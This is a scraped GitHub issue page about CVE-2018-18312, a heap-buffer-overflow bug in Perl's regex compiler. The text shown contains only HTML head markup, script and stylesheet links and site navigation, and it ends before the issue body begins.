CINXE.COM
[CVE-2018-18312] regcomp: heap-buffer-overflow write / reg_node overrun (perl-5.28.0, 5.26.2) · Issue #16649 · Perl/perl5 · GitHub
<!DOCTYPE html> <html lang="en" data-color-mode="auto" data-light-theme="light" data-dark-theme="dark" data-a11y-animated-images="system" data-a11y-link-underlines="true" > <head> <meta charset="utf-8"> <link rel="dns-prefetch" href="https://github.githubassets.com"> <link rel="dns-prefetch" href="https://avatars.githubusercontent.com"> <link rel="dns-prefetch" href="https://github-cloud.s3.amazonaws.com"> <link rel="dns-prefetch" href="https://user-images.githubusercontent.com/"> <link rel="preconnect" href="https://github.githubassets.com" crossorigin> <link rel="preconnect" href="https://avatars.githubusercontent.com"> <link crossorigin="anonymous" media="all" rel="stylesheet" href="https://github.githubassets.com/assets/light-74231a1f3bbb.css" /><link crossorigin="anonymous" media="all" rel="stylesheet" href="https://github.githubassets.com/assets/dark-8a995f0bacd4.css" /><link data-color-theme="dark_dimmed" crossorigin="anonymous" media="all" rel="stylesheet" data-href="https://github.githubassets.com/assets/dark_dimmed-f37fb7684b1f.css" /><link data-color-theme="dark_high_contrast" crossorigin="anonymous" media="all" rel="stylesheet" data-href="https://github.githubassets.com/assets/dark_high_contrast-9ac301c3ebe5.css" /><link data-color-theme="dark_colorblind" crossorigin="anonymous" media="all" rel="stylesheet" data-href="https://github.githubassets.com/assets/dark_colorblind-cd826e8636dc.css" /><link data-color-theme="light_colorblind" crossorigin="anonymous" media="all" rel="stylesheet" data-href="https://github.githubassets.com/assets/light_colorblind-f91b0f603451.css" /><link data-color-theme="light_high_contrast" crossorigin="anonymous" media="all" rel="stylesheet" data-href="https://github.githubassets.com/assets/light_high_contrast-83beb16e0ecf.css" /><link data-color-theme="light_tritanopia" crossorigin="anonymous" media="all" rel="stylesheet" data-href="https://github.githubassets.com/assets/light_tritanopia-6e122dab64fc.css" /><link data-color-theme="dark_tritanopia" crossorigin="anonymous" media="all" rel="stylesheet" data-href="https://github.githubassets.com/assets/dark_tritanopia-18119e682df0.css" /> <link crossorigin="anonymous" media="all" rel="stylesheet" href="https://github.githubassets.com/assets/primer-primitives-225433424a87.css" /> <link crossorigin="anonymous" media="all" rel="stylesheet" href="https://github.githubassets.com/assets/primer-aaa714e5674d.css" /> <link crossorigin="anonymous" media="all" rel="stylesheet" href="https://github.githubassets.com/assets/global-0a3c53b9d1c2.css" /> <link crossorigin="anonymous" media="all" rel="stylesheet" href="https://github.githubassets.com/assets/github-ea73c9cb5377.css" /> <link crossorigin="anonymous" media="all" rel="stylesheet" href="https://github.githubassets.com/assets/repository-4fce88777fa8.css" /> <script type="application/json" id="client-env">{"locale":"en","featureFlags":["copilot_immersive_issue_preview","copilot_new_references_ui","copilot_chat_repo_custom_instructions_preview","copilot_no_floating_button","copilot_topics_as_references","copilot_read_shared_conversation","copilot_duplicate_thread","copilot_buffered_streaming","dotcom_chat_client_side_skills","experimentation_azure_variant_endpoint","failbot_handle_non_errors","geojson_azure_maps","ghost_pilot_confidence_truncation_25","ghost_pilot_confidence_truncation_40","github_models_gateway_parse_params","github_models_o3_mini_streaming","insert_before_patch","issues_react_remove_placeholders","issues_react_blur_item_picker_on_close","issues_advanced_search_nested_ownership_filters","issues_dashboard_no_redirects","marketing_pages_search_explore_provider","primer_react_css_modules_ga","react_data_router_pull_requests","react_override_default_key","remove_child_patch","sample_network_conn_type","swp_enterprise_contact_form","site_proxima_australia_update","viewscreen_sandbox","issues_react_create_milestone","issues_react_cache_fix_workaround","lifecycle_label_name_updates","copilot_task_oriented_assistive_prompts","issue_types_prevent_private_type_creation","refresh_image_video_src","react_router_dispose_on_disconnect","codespaces_prebuild_region_target_update","turbo_app_id_restore","copilot_code_review_sign_up_closed"]}</script> <script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/wp-runtime-4111eaaac919.js"></script> <script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_oddbird_popover-polyfill_dist_popover_js-9da652f58479.js"></script> <script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_github_arianotify-polyfill_ariaNotify-polyfill_js-node_modules_github_mi-3abb8f-46b9f4874d95.js"></script> <script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/ui_packages_failbot_failbot_ts-952d624642a1.js"></script> <script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/environment-f04cb2a9fc8c.js"></script> <script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_primer_behaviors_dist_esm_index_mjs-0dbb79f97f8f.js"></script> <script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_github_selector-observer_dist_index_esm_js-f690fd9ae3d5.js"></script> <script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_github_relative-time-element_dist_index_js-62d275b7ddd9.js"></script> <script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_github_text-expander-element_dist_index_js-78748950cb0c.js"></script> <script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_github_auto-complete-element_dist_index_js-node_modules_github_catalyst_-8e9f78-a90ac05d2469.js"></script> <script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_github_filter-input-element_dist_index_js-node_modules_github_remote-inp-b5f1d7-a1760ffda83d.js"></script> <script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_github_markdown-toolbar-element_dist_index_js-ceef33f593fa.js"></script> <script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_github_file-attachment-element_dist_index_js-node_modules_primer_view-co-c44a69-efa32db3a345.js"></script> <script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/github-elements-394f8eb34f19.js"></script> <script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/element-registry-0fd720babc23.js"></script> <script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_braintree_browser-detection_dist_browser-detection_js-node_modules_githu-2906d7-2a07a295af40.js"></script> <script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_lit-html_lit-html_js-be8cb88f481b.js"></script> <script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_github_mini-throttle_dist_index_js-node_modules_morphdom_dist_morphdom-e-7c534c-a4a1922eb55f.js"></script> <script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_github_turbo_dist_turbo_es2017-esm_js-a03ee12d659a.js"></script> <script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_github_remote-form_dist_index_js-node_modules_delegated-events_dist_inde-893f9f-b6294cf703b7.js"></script> <script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_color-convert_index_js-e3180fe3bcb3.js"></script> <script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_github_quote-selection_dist_index_js-node_modules_github_session-resume_-947061-e7a6c4a19f98.js"></script> <script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/ui_packages_updatable-content_updatable-content_ts-62f3e9c52ece.js"></script> <script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/app_assets_modules_github_behaviors_task-list_ts-app_assets_modules_github_sso_ts-ui_packages-900dde-768abe60b1f8.js"></script> <script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/app_assets_modules_github_sticky-scroll-into-view_ts-3e000c5d31a9.js"></script> <script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/app_assets_modules_github_behaviors_ajax-error_ts-app_assets_modules_github_behaviors_include-87a4ae-eda74b9de9cd.js"></script> <script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/app_assets_modules_github_behaviors_commenting_edit_ts-app_assets_modules_github_behaviors_ht-83c235-e429cff6ceb1.js"></script> <script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/behaviors-c92ce7c6a557.js"></script> <script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_delegated-events_dist_index_js-node_modules_github_catalyst_lib_index_js-f6223d90c7ba.js"></script> <script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/notifications-global-01e85cd1be94.js"></script> <script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/primer-react-602097a4b0db.js"></script> <script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/react-core-56004cde4e29.js"></script> <script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/react-lib-f1bca44e0926.js"></script> <script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/octicons-react-cf2f2ab8dab4.js"></script> <script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_emotion_is-prop-valid_dist_emotion-is-prop-valid_esm_js-node_modules_emo-62da9f-2df2f32ec596.js"></script> <script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_github_mini-throttle_dist_index_js-node_modules_stacktrace-parser_dist_s-e7dcdd-9a233856b02c.js"></script> <script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_oddbird_popover-polyfill_dist_popover-fn_js-55fea94174bf.js"></script> <script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_dompurify_dist_purify_es_mjs-dd1d3ea6a436.js"></script> <script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_lodash-es__Stack_js-node_modules_lodash-es__Uint8Array_js-node_modules_l-4faaa6-4a736fde5c2f.js"></script> <script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_date-fns_format_mjs-6e4d0f904632.js"></script> <script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_date-fns_addWeeks_mjs-node_modules_date-fns_addYears_mjs-node_modules_da-827f4f-cf37cd06c24f.js"></script> <script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_react-relay_index_js-2d54b665e445.js"></script> <script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_focus-visible_dist_focus-visible_js-node_modules_fzy_js_index_js-node_mo-c4d1d6-73cf7c06cba8.js"></script> <script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_github_hotkey_dist_index_js-node_modules_date-fns_getDaysInMonth_mjs-nod-70c11b-75afe0f5c344.js"></script> <script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_lodash-es__baseIsEqual_js-8929eb9718d5.js"></script> <script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_github_hydro-analytics-client_dist_analytics-client_js-node_modules_gith-e0180f-d7cbd4bf80e8.js"></script> <script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_github_combobox-nav_dist_index_js-node_modules_github_g-emoji-element_di-24c074-57709bcf92f3.js"></script> <script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_react-relay_hooks_js-node_modules_color2k_dist_index_exports_import_es_m-e8b6bb-d8ead802a1fd.js"></script> <script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_dnd-kit_modifiers_dist_modifiers_esm_js-node_modules_dnd-kit_sortable_di-fe32b5-953cbe0ec5cf.js"></script> <script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_github_quote-selection_dist_index_js-node_modules_github_jtml_lib_index_-adcc7e-14d496a6175f.js"></script> <script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/ui_packages_aria-live_aria-live_ts-ui_packages_history_history_ts-ui_packages_promise-with-re-01dc80-b13b6c1d97b0.js"></script> <script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/ui_packages_paths_index_ts-3adbcf6faa83.js"></script> <script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/ui_packages_ui-commands_ui-commands_ts-e2a7ccb6ae86.js"></script> <script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/ui_packages_list-view_src_ListView_ListView_tsx-ui_packages_safe-html_SafeHTML_tsx-51c336a0c9f4.js"></script> <script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/ui_packages_list-view_src_ListItem_ListItem_tsx-ui_packages_list-view_src_ListItem_Title_tsx-e9e6a7840430.js"></script> <script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/ui_packages_date-picker_date-picker_ts-ui_packages_github-avatar_GitHubAvatar_tsx-df9548397fca.js"></script> <script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/ui_packages_item-picker_constants_labels_ts-ui_packages_item-picker_constants_values_ts-ui_pa-163a9a-f8278f1952f3.js"></script> <script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/ui_packages_item-picker_components_RepositoryPicker_tsx-3840f58896cc.js"></script> <script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/ui_packages_app-uuid_app-uuid_ts-ui_packages_document-metadata_document-metadata_ts-ui_packag-0663c3-2896593d16c3.js"></script> <script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/ui_packages_filter_providers_index_ts-5d0087de031e.js"></script> <script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/ui_packages_comment-box_api_file-upload_ts-ui_packages_comment-box_api_preview_ts-ui_packages-2c5e84-c2b4b77f6b48.js"></script> <script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/ui_packages_issue-create_dialog_CreateIssueDialogEntry_tsx-801ebf3a6a94.js"></script> <script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/ui_packages_drag-and-drop_drag-and-drop_ts-f7ba7b325c93.js"></script> <script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/ui_packages_signed-commit-badge_index_ts-ui_packages_use-navigate_use-navigate_ts-4dd0e0e5bd5d.js"></script> <script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/ui_packages_query-builder-element_query-builder-element_ts-b492d6900d5e.js"></script> <script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/ui_packages_item-picker_components_PullRequestAndBranchPicker_tsx-2e5f57a7e421.js"></script> <script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/ui_packages_use-client-value_use-client-value_ts-ui_packages_issue-viewer_components_IssueVie-d05a8f-fc4b9e6b7451.js"></script> <script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/ui_packages_issue-viewer_constants_hotkeys_ts-ui_packages_list-view-items-issues-prs_componen-f3edb7-52c1ea63ea86.js"></script> <script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/issues-react-b564da41fb1f.js"></script> <link crossorigin="anonymous" media="all" rel="stylesheet" href="https://github.githubassets.com/assets/primer-react.b8dd09195a62c061d3db.module.css" /> <link crossorigin="anonymous" media="all" rel="stylesheet" href="https://github.githubassets.com/assets/ui_packages_use-client-value_use-client-value_ts-ui_packages_issue-viewer_components_IssueVie-d05a8f.6439e2c61b0772f19b10.module.css" /> <link crossorigin="anonymous" media="all" rel="stylesheet" href="https://github.githubassets.com/assets/issues-react.53dd80bc27cea59c634f.module.css" /> <script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/notifications-subscriptions-menu-be96865e7e52.js"></script> <link crossorigin="anonymous" media="all" rel="stylesheet" href="https://github.githubassets.com/assets/notifications-subscriptions-menu.1bcff9205c241e99cff2.module.css" /> <title>[CVE-2018-18312] regcomp: heap-buffer-overflow write / reg_node overrun (perl-5.28.0, 5.26.2) · Issue #16649 · Perl/perl5 · GitHub</title> <meta name="route-pattern" content="/_view_fragments/issues/show/:user_id/:repository/:id/issue_layout(.:format)" data-turbo-transient> <meta name="route-controller" content="voltron_issues_fragments" data-turbo-transient> <meta name="route-action" content="issue_layout" data-turbo-transient> <meta name="current-catalog-service-hash" content="81bb79d38c15960b92d99bca9288a9108c7a47b18f2423d0f6438c5b7bcd2114"> <meta name="request-id" content="C922:1EF25D:1068798:110C7ED:67ECE56B" data-pjax-transient="true"/><meta name="html-safe-nonce" content="e8d879185843c75a2ee5c7d4f6806df48a51a81d81d9dada0fa9bd98dc1b403f" data-pjax-transient="true"/><meta name="visitor-payload" content="eyJyZWZlcnJlciI6IiIsInJlcXVlc3RfaWQiOiJDOTIyOjFFRjI1RDoxMDY4Nzk4OjExMEM3RUQ6NjdFQ0U1NkIiLCJ2aXNpdG9yX2lkIjoiOTQ3MzI3NTE2NDQ5NDk4NDc1IiwicmVnaW9uX2VkZ2UiOiJzb3V0aGVhc3Rhc2lhIiwicmVnaW9uX3JlbmRlciI6InNvdXRoZWFzdGFzaWEifQ==" data-pjax-transient="true"/><meta name="visitor-hmac" content="847d91fde122ff53b9f72a6e76b50bc2f30af60b6cd1a90564f2ef69a86db9ab" data-pjax-transient="true"/> <meta name="hovercard-subject-tag" content="issue:509394960" data-turbo-transient> <meta name="github-keyboard-shortcuts" content="repository,issues,copilot" data-turbo-transient="true" /> <meta name="selected-link" value="repo_issues" data-turbo-transient> <link rel="assets" href="https://github.githubassets.com/"> <meta name="google-site-verification" content="Apib7-x98H0j5cPqHWwSMm6dNU4GmODRoqxLiDzdx9I"> <meta name="octolytics-url" content="https://collector.github.com/github/collect" /> <meta name="analytics-location" content="/<user-name>/<repo-name>/voltron/issues_fragments/issue_layout" data-turbo-transient="true" /> <meta name="user-login" content=""> <meta name="viewport" content="width=device-width"> <meta name="description" content="Migrated from rt.perl.org#133423 (status was 'resolved') Searchable as RT133423$"> <link rel="search" type="application/opensearchdescription+xml" href="/opensearch.xml" title="GitHub"> <link rel="fluid-icon" href="https://github.com/fluidicon.png" title="GitHub"> <meta property="fb:app_id" content="1401488693436528"> <meta name="apple-itunes-app" content="app-id=1477376905, app-argument=https://github.com/_view_fragments/issues/show/Perl/perl5/16649/issue_layout" /> <meta name="twitter:image" content="https://opengraph.githubassets.com/11fe69fa79a1c507209ca10b8cf6bb6cf6e4dfc8e13b0159fa958f5153e44ef9/Perl/perl5/issues/16649" /><meta name="twitter:site" content="@github" /><meta name="twitter:card" content="summary_large_image" /><meta name="twitter:title" content="[CVE-2018-18312] regcomp: heap-buffer-overflow write / reg_node overrun (perl-5.28.0, 5.26.2) · Issue #16649 · Perl/perl5" /><meta name="twitter:description" content="Migrated from rt.perl.org#133423 (status was 'resolved') Searchable as RT133423$" /> <meta property="og:image" content="https://opengraph.githubassets.com/11fe69fa79a1c507209ca10b8cf6bb6cf6e4dfc8e13b0159fa958f5153e44ef9/Perl/perl5/issues/16649" /><meta property="og:image:alt" content="Migrated from rt.perl.org#133423 (status was 'resolved') Searchable as RT133423$" /><meta property="og:image:width" content="1200" /><meta property="og:image:height" content="600" /><meta property="og:site_name" content="GitHub" /><meta property="og:type" content="object" /><meta property="og:title" content="[CVE-2018-18312] regcomp: heap-buffer-overflow write / reg_node overrun (perl-5.28.0, 5.26.2) · Issue #16649 · Perl/perl5" /><meta property="og:url" content="https://github.com/Perl/perl5/issues/16649" /><meta property="og:description" content="Migrated from rt.perl.org#133423 (status was 'resolved') Searchable as RT133423$" /><meta property="og:author:username" content="p5pRT" /> <meta name="hostname" content="github.com"> <meta name="expected-hostname" content="github.com"> <meta http-equiv="x-pjax-version" content="e10ae1f039cd932ff5d7c35f40ecd52d72f5ff95f5a673bd077e85a985eb40c2" data-turbo-track="reload"> <meta http-equiv="x-pjax-csp-version" content="e26f9f0ba624ee85cc7ac057d8faa8618a4f25a85eab052c33d018ac0f6b1a46" data-turbo-track="reload"> <meta http-equiv="x-pjax-css-version" content="159e03504eed5183f9787c72780a7d8c1460af30746ab09d728b048c41719efa" data-turbo-track="reload"> <meta http-equiv="x-pjax-js-version" content="d27a837f5f02b01d1778df2c99b53a5b559db88ecf308e9113621479afb536db" data-turbo-track="reload"> <meta name="turbo-cache-control" content="no-preview" data-turbo-transient=""> <meta name="voltron-timing" value="512"> <meta name="go-import" content="github.com/Perl/perl5 git https://github.com/Perl/perl5.git"> <meta name="octolytics-dimension-user_id" content="3585411" /><meta name="octolytics-dimension-user_login" content="Perl" /><meta name="octolytics-dimension-repository_id" content="8183570" /><meta name="octolytics-dimension-repository_nwo" content="Perl/perl5" /><meta name="octolytics-dimension-repository_public" content="true" /><meta name="octolytics-dimension-repository_is_fork" content="false" /><meta name="octolytics-dimension-repository_network_root_id" content="8183570" /><meta name="octolytics-dimension-repository_network_root_nwo" content="Perl/perl5" /> <meta name="turbo-body-classes" content="logged-out env-production page-responsive"> <meta name="browser-stats-url" content="https://api.github.com/_private/browser/stats"> <meta name="browser-errors-url" content="https://api.github.com/_private/browser/errors"> <meta name="release" content="e2a096f8e00d3d3fe1444519c7f4f4130f20f2b7"> <link rel="mask-icon" href="https://github.githubassets.com/assets/pinned-octocat-093da3e6fa40.svg" color="#000000"> <link rel="alternate icon" class="js-site-favicon" type="image/png" href="https://github.githubassets.com/favicons/favicon.png"> <link rel="icon" class="js-site-favicon" type="image/svg+xml" href="https://github.githubassets.com/favicons/favicon.svg" data-base-href="https://github.githubassets.com/favicons/favicon"> <meta name="theme-color" content="#1e2327"> <meta name="color-scheme" content="light dark" /> <link rel="manifest" href="/manifest.json" crossOrigin="use-credentials"> </head> <body class="logged-out env-production page-responsive" style="word-wrap: break-word;"> <div data-turbo-body class="logged-out env-production page-responsive" style="word-wrap: break-word;"> <div class="position-relative header-wrapper js-header-wrapper "> <a href="#start-of-content" data-skip-target-assigned="false" class="px-2 py-4 color-bg-accent-emphasis color-fg-on-emphasis show-on-focus js-skip-to-content">Skip to content</a> <span data-view-component="true" class="progress-pjax-loader Progress position-fixed width-full"> <span style="width: 0%;" data-view-component="true" class="Progress-item progress-pjax-loader-bar left-0 top-0 color-bg-accent-emphasis"></span> </span> <script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/keyboard-shortcuts-dialog-e3ed32b00ef9.js"></script> <react-partial partial-name="keyboard-shortcuts-dialog" data-ssr="false" data-attempted-ssr="false" > <script type="application/json" data-target="react-partial.embeddedData">{"props":{"docsUrl":"https://docs.github.com/get-started/accessibility/keyboard-shortcuts"}}</script> <div data-target="react-partial.reactRoot"></div> </react-partial> <script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_github_remote-form_dist_index_js-node_modules_delegated-events_dist_inde-94fd67-4898d1bf4b51.js"></script> <script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/sessions-45d6658f8b6b.js"></script> <header class="HeaderMktg header-logged-out js-details-container js-header Details f4 py-3" role="banner" data-is-top="true" data-color-mode=light data-light-theme=light data-dark-theme=dark> <h2 class="sr-only">Navigation Menu</h2> <button type="button" class="HeaderMktg-backdrop d-lg-none border-0 position-fixed top-0 left-0 width-full height-full js-details-target" aria-label="Toggle navigation"> <span class="d-none">Toggle navigation</span> </button> <div class="d-flex flex-column flex-lg-row flex-items-center px-3 px-md-4 px-lg-5 height-full position-relative z-1"> <div class="d-flex flex-justify-between flex-items-center width-full width-lg-auto"> <div class="flex-1"> <button aria-label="Toggle navigation" aria-expanded="false" type="button" data-view-component="true" class="js-details-target js-nav-padding-recalculate js-header-menu-toggle Button--link Button--medium Button d-lg-none color-fg-inherit p-1"> <span class="Button-content"> <span class="Button-label"><div class="HeaderMenu-toggle-bar rounded my-1"></div> <div class="HeaderMenu-toggle-bar rounded my-1"></div> <div class="HeaderMenu-toggle-bar rounded my-1"></div></span> </span> </button> </div> <a class="mr-lg-3 color-fg-inherit flex-order-2 js-prevent-focus-on-mobile-nav" href="/" aria-label="Homepage" data-analytics-event="{"category":"Marketing nav","action":"click to go to homepage","label":"ref_page:Marketing;ref_cta:Logomark;ref_loc:Header"}"> <svg height="32" aria-hidden="true" viewBox="0 0 24 24" version="1.1" width="32" data-view-component="true" class="octicon octicon-mark-github"> <path d="M12 1C5.9225 1 1 5.9225 1 12C1 16.8675 4.14875 20.9787 8.52125 22.4362C9.07125 22.5325 9.2775 22.2025 9.2775 21.9137C9.2775 21.6525 9.26375 20.7862 9.26375 19.865C6.5 20.3737 5.785 19.1912 5.565 18.5725C5.44125 18.2562 4.905 17.28 4.4375 17.0187C4.0525 16.8125 3.5025 16.3037 4.42375 16.29C5.29 16.2762 5.90875 17.0875 6.115 17.4175C7.105 19.0812 8.68625 18.6137 9.31875 18.325C9.415 17.61 9.70375 17.1287 10.02 16.8537C7.5725 16.5787 5.015 15.63 5.015 11.4225C5.015 10.2262 5.44125 9.23625 6.1425 8.46625C6.0325 8.19125 5.6475 7.06375 6.2525 5.55125C6.2525 5.55125 7.17375 5.2625 9.2775 6.67875C10.1575 6.43125 11.0925 6.3075 12.0275 6.3075C12.9625 6.3075 13.8975 6.43125 14.7775 6.67875C16.8813 5.24875 17.8025 5.55125 17.8025 5.55125C18.4075 7.06375 18.0225 8.19125 17.9125 8.46625C18.6138 9.23625 19.04 10.2125 19.04 11.4225C19.04 15.6437 16.4688 16.5787 14.0213 16.8537C14.42 17.1975 14.7638 17.8575 14.7638 18.8887C14.7638 20.36 14.75 21.5425 14.75 21.9137C14.75 22.2025 14.9563 22.5462 15.5063 22.4362C19.8513 20.9787 23 16.8537 23 12C23 5.9225 18.0775 1 12 1Z"></path> </svg> </a> <div class="flex-1 flex-order-2 text-right"> <a href="/login?return_to=https%3A%2F%2Fgithub.com%2FPerl%2Fperl5%2Fissues%2F16649" class="HeaderMenu-link HeaderMenu-button d-inline-flex d-lg-none flex-order-1 f5 no-underline border color-border-default rounded-2 px-2 py-1 color-fg-inherit js-prevent-focus-on-mobile-nav" data-hydro-click="{"event_type":"authentication.click","payload":{"location_in_page":"site header menu","repository_id":null,"auth_type":"SIGN_UP","originating_url":"https://github.com/Perl/perl5/issues/16649","user_id":null}}" data-hydro-click-hmac="387e104a4aeea723f9808b36dd604512701e80ec48a53afc1733024c28e53a72" data-analytics-event="{"category":"Marketing nav","action":"click to Sign in","label":"ref_page:Marketing;ref_cta:Sign in;ref_loc:Header"}" > Sign in </a> </div> </div> <div class="HeaderMenu js-header-menu height-fit position-lg-relative d-lg-flex flex-column flex-auto top-0"> <div class="HeaderMenu-wrapper d-flex flex-column flex-self-start flex-lg-row flex-auto rounded rounded-lg-0"> <nav class="HeaderMenu-nav" aria-label="Global"> <ul class="d-lg-flex list-style-none"> <li class="HeaderMenu-item position-relative flex-wrap flex-justify-between flex-items-center d-block d-lg-flex flex-lg-nowrap flex-lg-items-center js-details-container js-header-menu-item"> <button type="button" class="HeaderMenu-link border-0 width-full width-lg-auto px-0 px-lg-2 py-lg-2 no-wrap d-flex flex-items-center flex-justify-between js-details-target" aria-expanded="false"> Product <svg opacity="0.5" aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-chevron-down HeaderMenu-icon ml-1"> <path d="M12.78 5.22a.749.749 0 0 1 0 1.06l-4.25 4.25a.749.749 0 0 1-1.06 0L3.22 6.28a.749.749 0 1 1 1.06-1.06L8 8.939l3.72-3.719a.749.749 0 0 1 1.06 0Z"></path> </svg> </button> <div class="HeaderMenu-dropdown dropdown-menu rounded m-0 p-0 pt-2 pt-lg-4 position-relative position-lg-absolute left-0 left-lg-n3 pb-2 pb-lg-4 d-lg-flex flex-wrap dropdown-menu-wide"> <div class="HeaderMenu-column px-lg-4 border-lg-right mb-4 mb-lg-0 pr-lg-7"> <div class="border-bottom pb-3 pb-lg-0 border-lg-bottom-0"> <ul class="list-style-none f5" > <li> <a class="HeaderMenu-dropdown-link d-block no-underline position-relative py-2 Link--secondary d-flex flex-items-center Link--has-description pb-lg-3" data-analytics-event="{"location":"navbar","action":"github_copilot","context":"product","tag":"link","label":"github_copilot_link_product_navbar"}" href="https://github.com/features/copilot"> <svg aria-hidden="true" height="24" viewBox="0 0 24 24" version="1.1" width="24" data-view-component="true" class="octicon octicon-copilot color-fg-subtle mr-3"> <path d="M23.922 16.992c-.861 1.495-5.859 5.023-11.922 5.023-6.063 0-11.061-3.528-11.922-5.023A.641.641 0 0 1 0 16.736v-2.869a.841.841 0 0 1 .053-.22c.372-.935 1.347-2.292 2.605-2.656.167-.429.414-1.055.644-1.517a10.195 10.195 0 0 1-.052-1.086c0-1.331.282-2.499 1.132-3.368.397-.406.89-.717 1.474-.952 1.399-1.136 3.392-2.093 